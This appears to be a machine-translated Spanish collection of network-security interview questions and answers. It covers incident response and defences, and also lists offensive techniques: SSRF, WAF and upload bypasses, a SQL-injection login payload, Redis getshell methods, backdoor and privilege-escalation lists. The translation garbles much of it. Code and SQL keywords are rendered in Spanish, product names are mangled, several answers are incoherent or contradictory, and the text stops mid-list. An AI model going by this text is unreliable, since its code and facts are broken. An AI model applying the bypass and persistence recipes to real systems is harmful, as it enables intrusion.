Las últimas preguntas reales de la entrevista a una empresa de seguridad de redes en 2022
Pregunta 1: ¿Qué equipo de seguridad ha usado antes y cuénteme cómo los usó?
Respuesta: He utilizado el equipo de análisis de tráfico completo de 360 Situation Awareness (también llamado Bennao) ids / ips / waf / Kelai, etc. Solo preséntame a alguien que sepa cómo hacerlo. Por ejemplo, 360 Bennao dijo directamente que participé en Una vez que la Guardia Nacional está en las Tres Gargantas, principalmente realiza análisis y juicios, verifica la información de la alarma y utiliza el análisis de registros para encontrar los detalles de IP de la red interna y externa, y finalmente determina si se trata de una falsa alarma.
Pregunta 2: ¿Está familiarizado con la arquitectura de la tecnología de seguridad en la nube?
Respuesta: He aprendido mucho sobre cómo minimizar el riesgo de fuga del plano de control, adoptar políticas como código de infraestructura de nube, permitir a los desarrolladores crear entornos de nube de forma segura, etc.
Pregunta 3: ¿Cómo se refuerza la seguridad del sistema Linux? Explique en detalle.
Respuesta:
1. Establecer la complejidad y composición de la contraseña (letras grandes/minúsculas, matemáticas, caracteres especiales)
2. Establecer tiempo de espera de inicio de sesión
3. Establecer una política de bloqueo de contraseña
4. Modificar el período de validez de la contraseña y la duración mínima.
Pregunta 4: ¿Qué equipo de escaneo faltante utiliza con frecuencia?
Respuesta: Hay dos tipos de escáneres: el escáner Tianjing y el escáner NSFOCUS.
Pregunta 5: ¿Cuánto sabes sobre ips?
Respuesta: El modo transparente de implementación en tándem (no es necesario configurar IP) es complejo. Tiene protección de capa de red y protección de capa de aplicación. Se basa principalmente en la biblioteca de firmas. Sin esta biblioteca de firmas, sus funciones son muy limitadas. También puede ser monitoreado en ips.Para lograr el bloqueo, si la red interna recibe un ataque, no podrás verlo desde las ips, solo podrás verlo desde los ids.
Pregunta 6: ¿Qué sabes sobre los protocolos de red?
Respuesta: Simplemente conéctese y busque los puertos más utilizados.
Pregunta 7: Cómo omitir ssrf
Respuesta: SSRF (falsificación de solicitud del lado del servidor) @ omisión de símbolo, reemplazo de símbolo especial, omisión de salto 302, ssrf coopera con el protocolo gopher para atacar redis sin autorización
Pregunta 8: ¿Alguna vez ha realizado una respuesta de emergencia?
Respuesta: He realizado algunas emergencias simples, como ideas para solucionar problemas de respuesta de emergencia al cargar archivos.
Se descubre un evento de emergencia y aparece un mensaje de alarma en el registro del servidor.
Después de iniciar sesión en la cuenta de administrador, abra cmd y use net user para verificar el usuario actual, los administradores de net localgronp para verificar si el usuario actual tiene un nuevo usuario, use el visor de eventos para buscar la información del evento de inicio de sesión exitoso 4624, verifique el nombre de usuario y hora de inicio de sesión reciente, y verifique el registro de inicio de sesión. Si hay un usuario, inicio de sesión remoto, comportamiento de craqueo por fuerza bruta, el punto de intrusión se conoce a través de registros web, transmisión web horse y ataques remotos, cargue archivos de script webshell a través de servidores externos. . Un atacante remoto obtiene el control del servidor cargando un troyano webshell, inicia sesión en el servidor de forma remota agregando un nuevo usuario y utiliza una herramienta para eliminar sombras para verificar si hay una sombra local.
Cuenta, verificar el proceso, verificar el estado de apertura del puerto a través de netsata-ano, eliminar procesos sospechosos, eliminar archivos de puerta trasera, verificar las tareas programadas de la computadora, taskchd.msc, eliminar tareas programadas sospechosas, usar software antivirus para realizar un análisis completo y elimine webshell y use la eliminación manual de cuentas sospechosas.
Pregunta 9: ¿Cuánto sabes sobre firewalls?
Respuesta: Aprendí sobre firewalls de dominio, firewalls Sangfor, etc.
Pregunta 10: Hable sobre su comprensión del trabajo de los ingenieros de operación y mantenimiento.
Respuesta: Administre la máquina bastión de la empresa, coopere con el departamento de desarrollo y realice actualizaciones, mantenimiento, inspecciones, configuraciones, etc. regulares del servidor.
¿Cuáles son las preguntas frecuentes en las entrevistas para ingenieros de seguridad de redes?
Pregunta 1: ¿Cuáles son los ataques web comunes? (¿Qué es un ataque de inyección SQL? ¿Qué es un ataque XSS? ¿Qué es un ataque CSRF?)
Respuesta:
1. Ataque XSS
【introducir】
Los ataques XSS son ataques de secuencias de comandos entre sitios, como enviar texto de contenido que contiene JavaScript ejecutable en un formulario. Si el servidor no filtra ni escapa estos scripts, y estos scripts se publican en la página en forma de contenido, si hay Cuando Si otros usuarios visitan esta página web, el navegador ejecutará estos scripts y será atacado, obteniendo así las cookies del usuario y otra información.
【defensa】
1. Para obtener información confidencial sobre cookies, utilice HttpOnly para que la cookie no se pueda encontrar en el objeto del documento.
2. Escapar de la información ingresada por el usuario.
2. Ataque CSRF
【introducir】
El ataque CSRF se refiere a la falsificación de solicitudes de dominio entre sitios. Por ejemplo, Xiao Ming no cerró el sitio web del banco cuando navegaba por el sitio web del banco A. En ese momento, Xiao Ming visitó el sitio web B que llevaba un ataque CSRF. En ese momento, el sitio web B envió un mensaje al servidor del banco. La solicitud de transferencia lleva la información de la cookie de Xiao Ming en el sitio web del banco y transfiere el dinero de la cuenta de Xiao Ming a la cuenta del propietario del sitio web B según los parámetros. Cuando se responde a la URL, Xiao El dinero de Ming se pierde.
【defensa】
1. Utilice códigos de verificación para solicitudes confidenciales.
2. Verifique el campo Referencia HTTP. El campo Referer registra la dirección de origen de la solicitud HTTP. Una solicitud enviada desde el sitio web del banco A llevará la dirección del sitio web A, y una solicitud enviada desde una dirección CSRF llevará la dirección del sitio web B. Solo necesitamos verificar el Referer en cada solicitud confidencial Valor, si se pasa desde el sitio web A, de lo contrario no se pasa. Sin embargo, este método depende de la seguridad del navegador y no es completamente seguro. En algunos navegadores, los ataques CSRF aún se pueden llevar a cabo manipulando el Referer. Además, cuando algunos usuarios desactivan el Referer, el servidor siempre rechazará la solicitud del cliente.
3. Agregue el token a la dirección de solicitud y verifíquelo. Después de que el usuario inicia sesión, se genera un token y se coloca en la sesión. En cada solicitud, el token se retira de la sesión y se agrega a la solicitud en forma de parámetros. Se establece un interceptor en el lado del servidor para verificar la token El token pasa; de lo contrario, se rechaza. Sin embargo, este método también tiene problemas de seguridad. Algunos sitios web permiten a los usuarios publicar enlaces. Si un pirata informático publica la dirección de su sitio web personal en el sitio web, el sistema también agregará un token a la dirección. Luego, el pirata informático puede agregar un token a la dirección en su propio sitio web. Obtenga este parámetro de token para lanzar un ataque CSRF.
4. Personalice el token de atributo en el encabezado HTTP y verifíquelo. Coloque el token en el encabezado HTTP como un atributo personalizado y, al encapsular XMLHttpRequest, puede agregar el atributo del token a todas las solicitudes a la vez. De esta forma, el token no quedará expuesto en la dirección del navegador.
3. Inyección SQL
【introducir】
Ataque de inyección SQL. Cuando el atacante envía el formulario, completa las declaraciones SQL relevantes en el formulario, y el sistema trata estos campos como variables ordinarias y los envía al servidor para consultas SQL. Luego, el SQL completado por el atacante Se unirá a la declaración system.sql para realizar ciertas operaciones en la base de datos.
Por ejemplo, en un formulario de inicio de sesión simple
<formulario acción="/login" método="POST"> Nombre de usuario: <tipo de entrada="texto" nombre="nombre de usuario" /> Contraseña: <tipo de entrada="contraseña" nombre="contraseña" /> <tipo de entrada= "enviar" valor="登陆" /></formulario>
En este momento, la declaración SQL procesada por el sistema es la siguiente:
nombre de usuario:=r.Form.Get("nombre de usuario")contraseña:=r.Form.Get("contraseña")sql:="SELECCIONAR * DEL usuario DONDE nombre de usuario='"+nombre de usuario+"' Y contraseña='"+contraseña+ "'"
En este momento, el nombre de usuario ingresado por el atacante es el siguiente y la contraseña es cualquier valor:
miusuario' o 'foo' = 'foo' --
Entonces la declaración SQL del sistema será así
SELECCIONE * DEL usuario DONDE nombre de usuario = 'mi usuario' o 'foo' = 'foo' --'' Y contraseña = 'xxx'
Entonces el atacante iniciará sesión exitosamente
【defensa】
1. Filtrado de formularios, verificar la legalidad del envío del formulario y escapar de algunos caracteres especiales.
2. Minimizar los permisos de la base de datos
3. La declaración de consulta utiliza la interfaz de consulta parametrizada proporcionada por la base de datos, no empalme SQL directamente.
4. Autenticación de identidad y sesión
【ataque】
Los piratas informáticos desactivan JS en el navegador para evitar la verificación del lado del cliente y realizar determinadas operaciones.
【defensa】
1. Ocultar información confidencial.
2. Cifrar información confidencial.
3. La sesión caduca periódicamente
5. Permisos y Control de Acceso
【ataque】
Puede acceder a las páginas de otras personas modificando los parámetros de la URL. Por ejemplo, un hacker puede utilizar el siguiente enlace para acceder a su propio enlace de pedido en un determinado centro comercial.
https://***.***.com/normal/item.action?orderid=51338221644
En este momento, si el sitio web no tiene una verificación de permiso relevante, también puede acceder a los pedidos de otras personas a través del siguiente enlace.
https://***.***.com/normal/item.action?orderid=otra identificación
Esto hará que se filtre la privacidad de otras personas en el centro comercial.
【defensa】
1. Agregue un sistema de permisos y agregue la verificación correspondiente al acceder.
6. Almacenamiento cifrado inseguro
【defensa】
1. Cifre y almacene información confidencial
2. No es necesario el cifrado md5
7. Cargar vulnerabilidades
【ataque】
Al cargar imágenes, el atacante no carga imágenes, sino scripts que se pueden ejecutar de forma remota. En este momento, el intruso puede ejecutar de forma remota el script para atacar el servidor.
【defensa】
1. Limite los tipos de carga de archivos
2. Utilice alojamiento de archivos de terceros, etc.
8. La capa de transporte no está cifrada.
【defensa】
1. Utilice una versión segura de https
2. La información confidencial se transmite mediante https
3. La información no confidencial se transmite mediante http
9. Redirección y reenvío no verificados
【ataque】
Para el phishing, los piratas informáticos agregan parámetros de salto después de la URL vulnerable, transcodifican los parámetros y envían el enlace al usuario para inducirlo a hacer clic. En este momento, el usuario ve una URL familiar en la parte superior del enlace y hace clic. Como resultado, el clic del usuario es redirigido a un sitio web ilegal.
【defensa】
1. Agregar lista blanca de salto
2. Antes del salto, se solicita al usuario que salte a otras páginas web sospechosas.
10. WebShell
【ataque】
El pirata informático carga el archivo abc.asp;.jsp en el sitio web atacado en el sistema win. En este momento, el sistema lo reconoce como un archivo jsp y luego, cuando se transmite al servidor, algunos sistemas lo reconocerán como un archivo asp.
Resumen de las preguntas de la entrevista sobre seguridad de red más completas de la historia
Pregunta 1: ¿Cómo utilizar la ruta absoluta en PHP?
Respuesta:
Las comillas simples causan errores en la base de datos, acceden a parámetros incorrectos o rutas incorrectas, investigan archivos como phpinfo, escanean y desarrollan archivos de prueba no eliminados, piratean Google, phpmyadmin informa la ruta: /phpmyadmin/libraries/lect_lang.lib.php, explotan la vulnerabilidad, leen el archivo de configuración para encontrar la ruta y utilizarlo de forma maliciosa. Funciones del sitio web, como la función de lectura de imágenes local para leer imágenes que no existen y el punto de carga para cargar archivos que no se pueden importar normalmente.
Pregunta 2: ¿Cuáles son las herramientas de penetración que utiliza habitualmente y cuál es la más utilizada?
Respuesta:
burp, nmap, sqlmap, awvs, ant Sword, ice scorpion, dirsearch, Yujian, etc.
Utilización de escritura ciega xss en el servidor de intranet
Recopilación de información del administrador de phishing
Pregunta 3: ¿Ataque con arpón y ataque con abrevadero?
Respuesta:
Ataque de lanza: se refiere al uso de programas de caballo de Troya como archivos adjuntos de correo electrónico, enviados a la computadora objetivo, induciendo a la víctima a abrir el archivo adjunto para infectar el caballo de Troya. Ataque de abrevadero: analiza los patrones de actividad de Internet del objetivo del ataque y encuentra las debilidades de los sitios web visitados con frecuencia por el objetivo del ataque. , irrumpen en el sitio web e implantan programas maliciosos, esperando que el objetivo acceda
Pregunta 4: ¿Qué es el escape de la máquina virtual?
Respuesta:
Explotar vulnerabilidades en el software de la máquina virtual o en el software que se ejecuta en la máquina virtual para atacar o controlar el sistema operativo del host de la máquina virtual.
Pregunta 5: ¿Ataque de intermediario?
Respuesta:
principio:
En la misma LAN, interceptando datos de comunicación de red normales y realizando manipulación y rastreo de datos.
defensa:
Vincule la dirección MAC e IP de la puerta de enlace al host de forma estática. Vincule la dirección IP y MAC del host a la puerta de enlace y utilice el firewall ARP.
Pregunta 6: ¿Proceso de protocolo de enlace de tres vías TCP?
Respuesta:
Primer apretón de manos: al establecer una conexión, el cliente envía un paquete de sincronización (syn = j) al servidor y entra en el estado SYN_SEND, esperando que el servidor confirme. Segundo apretón de manos: el servidor recibe el paquete de sincronización y debe confirmar el SYN del cliente. (ack = j +1), y al mismo tiempo, también envía un paquete SYN (syn = k), es decir, paquete SYN + ACK. En este momento, el servidor ingresa al estado SYN_RECV. El tercer protocolo de enlace: el El cliente recibe el paquete SYN+ACK del servidor y envía un paquete de confirmación ACK al servidor (ack=k+1). Después de enviar este paquete, el cliente y el servidor ingresan al estado ESTABLECIDO y completan el protocolo de enlace de tres vías.
Pregunta 7: ¿Modelo de siete capas?
Respuesta:
Capa de aplicación, capa de presentación, capa de sesión, capa de transporte, capa de red, capa de enlace de datos, capa física
Pregunta 8: Comprensión de la seguridad en la nube
Respuesta:
Al integrar tecnologías y conceptos emergentes como procesamiento paralelo, computación en red y juicio de comportamiento de virus desconocidos, monitorea el comportamiento anormal del software en la red a través de una gran cantidad de clientes en la red, obtiene la información más reciente sobre troyanos y programas maliciosos en Internet. y lo transmite al servidor, realiza análisis y procesamiento automático y luego distribuye virus y soluciones troyanos a cada cliente.
Pregunta 9: ¿Has aprendido sobre websocket?
Respuesta:
WebSocket es un protocolo para comunicación full-duplex en una única conexión TCP. Su característica más importante es que el servidor puede enviar información activamente al cliente, y el cliente también puede enviar información activamente al servidor. Es un verdadero equivalente bidireccional. diálogo.
Pregunta 10: ¿Qué es DDOS? ¿Qué? ¿Qué es el ataque CC? ¿Cual es la diferencia?
Respuesta:
DDOS:
Los ataques distribuidos de denegación de servicio utilizan solicitudes de servicio razonables para ocupar demasiados recursos de servicio, de modo que los usuarios legítimos no puedan obtener respuestas de servicio. Métodos principales: SYN Flood UDP Flood ICMP Flood Connection Flood HTTP Get UDP DNS Query Flood
Ataque CC:
Simule múltiples usuarios normales para acceder continuamente a páginas como foros que requieren una gran cantidad de operaciones de datos, lo que resulta en un desperdicio de recursos del servidor, CPU al 100% durante mucho tiempo y congestión de la red.
La diferencia entre los dos:
CC ataca páginas web y DDOS ataca servidores. Es más difícil defenderse contra CC. El umbral es bajo. DDOS requiere una gran cantidad de servidores. CC dura mucho tiempo y DDOS tiene un gran impacto.
Pregunta 11: ¿Qué es un ataque terrestre?
Respuesta:
Un ataque de denegación de servicio LAN, un tipo de ataque DDOS, paraliza los dispositivos objetivo que carecen de los mecanismos de protección correspondientes mediante el envío de paquetes de datos falsos cuidadosamente construidos con la misma dirección de origen y de destino.
Pregunta 12: ¿Cómo recopilará información?
Respuesta:
Información del servidor: IP, middleware, nombre de dominio del sistema operativo whois, ipwhois, detección de nombre de subdominio de segmento de red, escaneo de directorio de sitios web, escaneo de información de interfaz, escaneo de puertos, información relacionada con la búsqueda de motores principales
Pregunta 13: ¿Qué es un ataque de inyección CRLF?
Respuesta:
Al inyectar caracteres de "retorno de carro" y "avance de línea" en la secuencia HTTP, se puede lograr manipulación de sitios web, secuencias de comandos entre sitios, secuestro, etc.
Pregunta 14: ¿Prevenir XSS desde la perspectiva del front-end y del back-end?
Respuesta:
Interfaz:
Los caracteres especiales ingresados por el usuario se filtran y se escapan a la codificación de salida del usuario de entidades html.
extremo posterior:
El filtro de función de codificación materializada limita la longitud de los caracteres
Pregunta 15: ¿Cómo proteger la seguridad de un puerto?
Respuesta:
Utilice puertos de servicio peligrosos de WAF, IDS, IPS y otros equipos para prohibir el acceso externo o restringir el acceso IP. El servicio actualiza periódicamente la versión.
Pregunta 16: ¿Ideas de detección de Webshell?
Respuesta:
Detección estática: firmas coincidentes, valores característicos, funciones peligrosas Detección dinámica: WAF, IDS y otros registros de dispositivos: filtrado monitoreo de la integridad de los archivos a través de reglas de acceso IP y reglas de acceso a páginas
Pregunta 17: ¿Cómo probar la vulnerabilidad de un sitio web IIS? (según versión)
Respuesta:
https://mp.weixin.qq.com/s/5XV984kErF2Zhh-P5aoUwQ
Pregunta 18: ¿Qué es GPC? ¿Cómo evitarlo si está habilitado?
Respuesta:
GPC:
Magic_quotes_gpc en el archivo de configuración php.ini implementa la adición de barras invertidas a comillas simples, comillas dobles, barras invertidas y caracteres NULL pasados en get, post y cookie\
Derivación:
El GPC de PHP5 ignora $_SERVER y puede inyectar una inyección secundaria de bytes amplios en el encabezado de la solicitud http.
Pregunta 19: ¿Cuáles son los algoritmos de cifrado que se utilizan habitualmente en la web?
Respuesta:
Cifrado hash unidireccional MD5, SHA, MAC Cifrado simétrico AES, DES Cifrado asimétrico RSA, RSA2
Pregunta 20: ¿Qué más puede hacer XSS además de recibir cookies?
Respuesta:
Obtenga la captura de pantalla del registro de teclas de minería JS del front-end del ataque de phishing del gusano ip xss del administrador
Problema 21: Secuestro de red de operador (u otro)
Respuesta:
Secuestro de operador: Publicidad Secuestro de DNS: Manipulación de DNS y secuestro de la red por diversos medios
Pregunta 22: ¿Qué es la suplantación de DNS?
Respuesta:
Un comportamiento engañoso en el que los atacantes se hacen pasar por servidores de nombres de dominio.
Pregunta 23: Principios y defensas contra el desbordamiento del búfer
Respuesta:
principio:
Cuando la cantidad de datos escritos en el búfer excede la capacidad máxima del búfer, se produce un desbordamiento del búfer y los piratas informáticos explotan los datos desbordados para formar una vulnerabilidad de ejecución remota de código.
defensa:
Programación de seguridad basada en la verificación de límites del búfer de defensa del sistema operativo
Pregunta 24: Respuesta de emergencia a incidentes de ciberseguridad
Respuesta:
Desconexión: dé prioridad a desconectarse de la red cuando las condiciones lo permitan, para evitar que los piratas informáticos realicen más operaciones o eliminen rastros. Análisis forense: encuentre la IP del pirata informático analizando los registros de inicio de sesión, los registros del sitio web y los registros de servicios, y vea las operaciones realizadas por el pirata informático. Copia de seguridad: haga una copia de seguridad de los archivos del servidor y compare los cambios antes y después de la intrusión. Detección de fugas de archivos: utilice los pasos anteriores para encontrar debilidades comerciales y reparar vulnerabilidades. Antivirus: elimine las puertas traseras, los webshells y las cuentas de administración dejadas por los piratas informáticos. Trazabilidad : Registro a través de direcciones IP de hackers, métodos de intrusión, etc.: Archivado y prevención.
Pregunta 25: Seguridad interna de la empresa
Respuesta:
Redes de nombre real. Aislar segmentos de red importantes y prohibir el acceso a cualquier dispositivo USB. Deshabilitar la vinculación de direcciones IP y MAC de la red WIFI. Implementar capacitación periódica sobre monitoreo de red, equipos IDS e IPS para mejorar la concientización sobre la seguridad de los empleados.
Pregunta 26: Cómo probar el negocio antes de que esté en línea y desde qué ángulos
Respuesta:
Pruebas de seguridad: búsqueda de vulnerabilidades de productos, vulnerabilidades de páginas, vulnerabilidades de servicios, fugas de información confidencial, vulnerabilidades lógicas, contraseñas débiles. Pruebas de rendimiento: pruebas de estrés, pruebas de integridad funcional.
Pregunta 27: La aplicación tiene una vulnerabilidad, pero no se puede reparar ni desactivar ¿Qué debes hacer?
Respuesta:
Restrinja el acceso a la lista blanca de IP mediante WAF, IDS y dispositivos de firewall
Pregunta 28: ¿Cómo protegerse contra CSRF?
Respuesta:
Verificar el campo de referencia HTTP Agregar el campo Token y verificar Agregar el campo personalizado y verificar
Pregunta 29: ¿Cómo evitar la carga de archivos?
Respuesta:
Omisión WAF:
Modificar campos de formulario de carga, mayúsculas y minúsculas de campos de formulario, reemplazar campos de formulario, agregar o reducir espacios, concatenación de cadenas de campos de formulario, construir un formulario de carga de archivos duales y cargar archivos duales al mismo tiempo. Codificación, evitando el llenado de datos basura, evitando las mayúsculas y minúsculas del nombre de archivo. , evitando
Omisión de detección del servidor:
El tipo MIME omite la detección de JS frontal, captura paquetes, cambia paquetes, omite omisiones de listas negras: php3, asa, ashx, funciones de Windows (test.asp_, funciones de transmisión), detección de contenido de imágenes de vulnerabilidad de análisis de Apache, utiliza la omisión de image horse bypass.htassess
Omisión de detección de lista blanca:
Truncar la carga para evitar la vulnerabilidad de análisis IIS6/7/7.5, el archivo de vulnerabilidad de análisis de versión baja de nginx contiene omisión
Pregunta 30: Puntos de utilización relacionados con el código de verificación
Respuesta:
Reutilización del código de verificación El código de verificación puede identificar el código de verificación Código de verificación no válido DDOS
Pregunta 31: ¿Qué probarás para las cookies?
Respuesta:
El permiso xss de inyección SQL evita la fuga de información confidencial
Pregunta 32: ¿Nombre varios tipos de vulnerabilidades de lógica empresarial?
Respuesta:
Restablezca la contraseña de cualquier usuario mediante bombardeo de SMS, modifique el monto del pedido, modifique la contraseña olvidada, evite el fraude de tickets malicioso, reutilice el código de verificación
Problema 33: El archivo de descripción breve contiene una vulnerabilidad
Respuesta:
Al llamar a funciones de inclusión de archivos, los nombres y rutas de los archivos no están estrictamente restringidos, como include(), require() y otras funciones.
Pregunta 34: ¿Cuáles son algunos ejemplos de vulnerabilidades de lógica empresarial y restablecimientos arbitrarios de contraseñas por parte de los usuarios, y qué factores los causaron?
Respuesta:
Los usuarios comunes restablecen las contraseñas de los usuarios administrativos Los usuarios comunes restablecen las contraseñas de los usuarios comunes
El token único del usuario no está configurado, lo que genera un acceso no autorizado.
Pregunta 35: Durante la prueba de penetración se encontró una función que solo puede cargar archivos zip, ¿qué posibles ideas hay?
Respuesta:
Shell se comprime y carga, y el programa autoextrae getshell. Intente analizar la vulnerabilidad getshell. Busque archivos que contengan vulnerabilidades, troyanos y administradores de phishing.
Pregunta 36: ¿Por qué el troyano aspx tiene mayores permisos que asp?
Respuesta:
aspx usa tecnología .net, que no es compatible de forma predeterminada en IIS. ASPX necesita depender del marco .net. ASP es solo un lenguaje de script. Cuando se intruyen, los troyanos asp generalmente tienen permisos de invitado. Los troyanos APSX generalmente tienen permisos de usuarios.
Pregunta 37: ¿Cuáles son las ideas para tener una sola página de inicio de sesión?
Respuesta:
Inyección SQL, descifrado por fuerza bruta de contraseñas universales, omisión de permisos, escaneo de directorios, filtración de información confidencial
Pregunta 38: ¿Qué encabezados de solicitud son dañinos?
Respuesta:
Inyección de COOKIE Inyección de agente de usuario X-Reenviado-Para inyección Inyección de referencia
Pregunta 39: ¿Habla sobre la diferencia entre acceso horizontal/vertical/no autorizado no autorizado?
Respuesta:
Anulación horizontal: los usuarios comunes anulan su autoridad para acceder a los usuarios comunes Anulación vertical: los usuarios comunes anulan su autoridad para acceder a los usuarios de administración Acceso no autorizado: el control de permisos no es estricto, por lo que no es necesario iniciar sesión para acceder a las páginas de los usuarios que han iniciado sesión
Pregunta 40: ¿Qué es xss? Los peligros y principios de ejecutar xss almacenados.
Respuesta:
XSS almacenado, reflexivo y DOM almacenado significa que la aplicación obtiene datos no confiables a través de solicitudes web y los almacena en la base de datos sin verificar si los datos contienen código XSS.
Peligros XSS almacenados:
Robar cookies de usuario Ataque de phishing XSS Ataque de gusano XSS Obtener registro de teclas Obtener información del usuario Obtener capturas de pantalla
Pregunta 41: Se sospecha que el host ha sido invadido. ¿Dónde debo verificar los registros?
Respuesta:
Registro de inicio de sesión del sistema Registro de acceso al servicio Registro del sitio web Registro de la base de datos
Pregunta 42: Bibliotecas estándar de uso común en Python
Respuesta:
Expresión regular re tiempo módulo tiempo número aleatorio sistema operativo interfaz os computación científica matemáticas red solicitud urlib biblioteca http solicitudes biblioteca rastreador Biblioteca de subprocesos múltiples Scrapy subprocesamiento
Pregunta 43: ¿Cuál es la diferencia entre reverse_tcp y bind_tcp?
Respuesta:
reverse_tcp: la máquina de ataque establece un puerto y una IP. La carga útil se ejecuta en la máquina de prueba para conectarse al puerto de la IP de la máquina de ataque. En este momento, si la máquina de ataque monitorea el puerto, se encontrará que la máquina de prueba ha sido conectado. En otras palabras, la máquina controlada se conecta activamente con nosotros. bind_tcp: Máquina de ataque Establece un puerto (LPORT), y la carga útil se ejecuta en la máquina de prueba para abrir el puerto para que la máquina atacante pueda acceder. En otras palabras, la máquina controlada se conecta activamente con nosotros. En otras palabras, nos conectamos activamente a la máquina controlada y usamos reverse_tcp, que es más seguro y generalmente no será descubierto por el firewall.
Pregunta 44: ¿Qué problemas pueden ocurrir durante el proceso de autenticación de OAuth y qué tipo de vulnerabilidades pueden resultar?
Respuesta:
La verificación CSRF de redirección_uri no es estricta y se pasa el parámetro incorrecto
Pregunta 45: Cómo obtener la IP real de un sitio web que tiene CDN
Respuesta:
Archivos de sonda de registro de análisis del historial de consultas de ping global, como phpinfo, etc. Utilice la ejecución de comandos para conectarse a nuestro servidor o DNSlog para encontrar la configuración del sitio web. Escanee toda la red a través del nombre de dominio de segundo nivel y haga coincidir el título.
Pregunta 46: ¿Cómo lograr dominios cruzados?
Respuesta:
jsonp CORS agente de intercambio de recursos entre dominios solicitud entre dominios El método postMessage Html5 modifica document.domain entre subdominios según el protocolo websocket Html5 http://document.xxx + iframe
Pregunta 47: ¿Cuál es la diferencia entre dominio cruzado jsonp y dominio cruzado CORS?
Respuesta:
jsonp tiene buena compatibilidad con navegadores, pero CORS no es compatible con navegadores IE9 e inferiores. jsonp solo admite GET. CORS admite todo tipo de solicitudes HTTP. jsonp solo envía una solicitud y CORS envía dos solicitudes complejas.
Pregunta 48: ¿Explotación de vulnerabilidad SSRF?
Respuesta:
Detección de servicios de lectura de archivos locales, ataques de escaneo de puertos intranet redis, mysql, fastcgi y otros servicios
Los protocolos utilizados son: http/s, file, gopher, tftp, dict, ssh, telnet
Pregunta 49: ¿Métodos comunes de puerta trasera?
Respuesta:
Ventanas:
Registro de inicio automático, puerta trasera, software de control remoto, webshell, agregar administración, usuario, usuario oculto, tarea programada, secuestro de dll, secuestro de registro, puerta trasera MBR, puerta trasera WMI, registro de contraseña de administrador
Linux:
Puerta trasera SSH Puerta trasera SUID Tarea programada Crontab Puerta trasera PAM Agregar cuenta de administrador Rootkit
Pregunta 50: ¿Cómo evitar las restricciones de acceso al directorio open_basedir?
Respuesta:
Utilice la función de ejecución de comandos para omitir Utilice la función symlink() para omitir la omisión del pseudoprotocolo global
Pregunta 51: ¿Cuáles son los problemas comunes en la auditoría de código PHP?
Respuesta:
Es probable que todos los métodos de empalme de parámetros produzcan inyección de SQL (un lugar común). Sobrescritura de variables causada por el registro global de variables. Los parámetros de escritura sin filtrar provocaron omisiones de verificación de permisos de ejecución de código. La carga arbitraria de archivos en la interfaz de acceso a la función en segundo plano deserializa la vulnerabilidad de deserialización.
Pregunta 52: En el enfrentamiento rojo-azul, ¿el escenario y la postura del equipo azul contraatacando al equipo rojo?
Respuesta:
Pesca, Miel, Hormiga Espada RCE
Pregunta 53: Tareas programadas de Linux, ¿qué haría un hacker para ocultar sus tareas programadas?
Respuesta:
Tareas temporales: en, comandos por lotes
Pregunta 54: ¿Cuáles son las formas comunes de obtener Shell sin autorización de Redis?
Respuesta:
Escriba shell con ruta absoluta web Escriba la clave pública ssh para obtener permisos del servidor Copia maestro-esclavo getshell
Pregunta 55: ¿Métodos de ataque JWT? (encabezado, carga útil, firma)
Respuesta:
Establecer el algoritmo de cifrado en vacío omite la autenticación y explota los parámetros de clave débil: lectura de archivos arbitrarios, inyección de SQL, inyección de comandos, firma no verificada y recodificación de contenido.
Pregunta 56: Vulnerabilidades del middleware JAVA, ¿cuáles son algunos ejemplos?
Respuesta:
Deserialización de JBoss Deserialización de WebLogic Escritura de archivos arbitrarios de Tomcat, contraseña débil + getshell en segundo plano
Pregunta 57: ¿Para qué vulnerabilidades se puede utilizar la extracción de DNS?
Respuesta:
El comando de inyección ciega SQL sin eco ejecuta escritura ciega XXE escritura ciega SSRF
Solo HTTP prohíbe que JS lea la información de las cookies. ¿Cómo evitar esto para obtener cookies?
Secuestrar página de inicio de sesión para evitar phishing
Pregunta 58: ¿Resumen de las vulnerabilidades del middleware?
Respuesta:
Aquí sólo escribimos sobre vulnerabilidades comúnmente explotadas.
IIS:
IIS6.0 Vulnerabilidad PUT IIS6.0 Vulnerabilidad de ejecución remota de código IIS6.0 Vulnerabilidad de análisis IIS enable .net Vulnerabilidad de nombre de archivo corto IIS7.0/7.5 Vulnerabilidad de análisis
Apache:
Vulnerabilidad de análisis de extensión desconocida, vulnerabilidad de análisis y cruce de directorio causado por errores de coordinación
Nginx:
Análisis de vulnerabilidades y recorrido de directorios causado por errores de configuración
Gato:
Vulnerabilidades de ejecución de código arbitrario y escritura de archivos arbitrarios causadas por errores de configuración Contraseña débil + administración en segundo plano implementación del paquete war getshell manager/gestión html en segundo plano explosión de contraseñas débiles
JJefe:
Vulnerabilidad de deserialización 5.x/6.x (CVE-2017-12149) Deserialización de JMXInvokerServlet Deserialización de EJBInvokerServlet Consola JMX acceso no autorizado a contraseña débil + administración en segundo plano implementación del paquete de guerra getshell
WebLogic:
Vulnerabilidad de deserialización de XMLDecoder (CVE-2017-10271 y CVE-2017-3506) wls9_async_response,wls-wsat Vulnerabilidad de ejecución remota de código de deserialización (CVE-2019-2725) Vulnerabilidad de ejecución de comandos de deserialización de componentes principales de WLS (CVE-2018-2628) Contraseña débil + gestión de fondo guerra implementación del paquete getshell
Pregunta 59: ¿Habla sobre la idea de elevar privilegios en sistemas Windows y sistemas Linux?
Respuesta:
Ventanas:
Escalada de privilegios de base de datos: mysql, sqlserver Escalada de privilegios de software de terceros: sistema de secuestro de DLL de serv-u Escalada de privilegios de vulnerabilidad de desbordamiento del kernel: serie cve
Linux:
escalada de privilegios sudo escalada de privilegios suid escalada de privilegios del kernel de redis
Pregunta 60: ¿Qué frameworks tiene Python y qué vulnerabilidades han aparecido en ellos?
Respuesta:
Django, Flask, Scrapy Django ejecuta la inyección de plantilla Flask en código arbitrario
Pregunta 61: La diferencia entre la penetración de programas pequeños y la penetración ordinaria
Respuesta:
El proceso de penetración se mantiene sin cambios, todavía se trata de capturar paquetes y modificar parámetros. La diferencia entre penetración y penetración es que el mini programa descargará el paquete al local y usted puede usar la herramienta de restauración inversa para descompilarlo.
Pregunta 62: Cuatro componentes principales de las pruebas de vulnerabilidad en la propia aplicación
Respuesta:
Componente de actividad:
Vulnerabilidad de ActivityManager de protocolo personalizado y navegable de enlace de actividad
Componente de servicio:
Escalada de privilegios, ataques de denegación de servicio
Componente receptor de transmisión:
Gestión inadecuada de permisos Vulnerabilidad de exportación de BroadcastReceiver Vulnerabilidad de exposición de componentes de transmisión de registro dinámico
Componente del proveedor de contenido:
